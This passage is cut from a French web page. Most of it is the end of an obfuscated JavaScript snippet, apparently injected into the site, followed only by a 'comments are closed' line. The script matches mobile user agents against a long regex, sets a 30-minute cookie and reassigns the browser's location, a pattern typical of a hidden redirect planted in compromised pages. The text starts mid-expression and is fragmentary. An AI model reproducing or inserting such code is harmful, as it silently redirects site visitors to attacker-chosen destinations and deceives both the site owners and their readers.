)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Les commentaires sont fermés.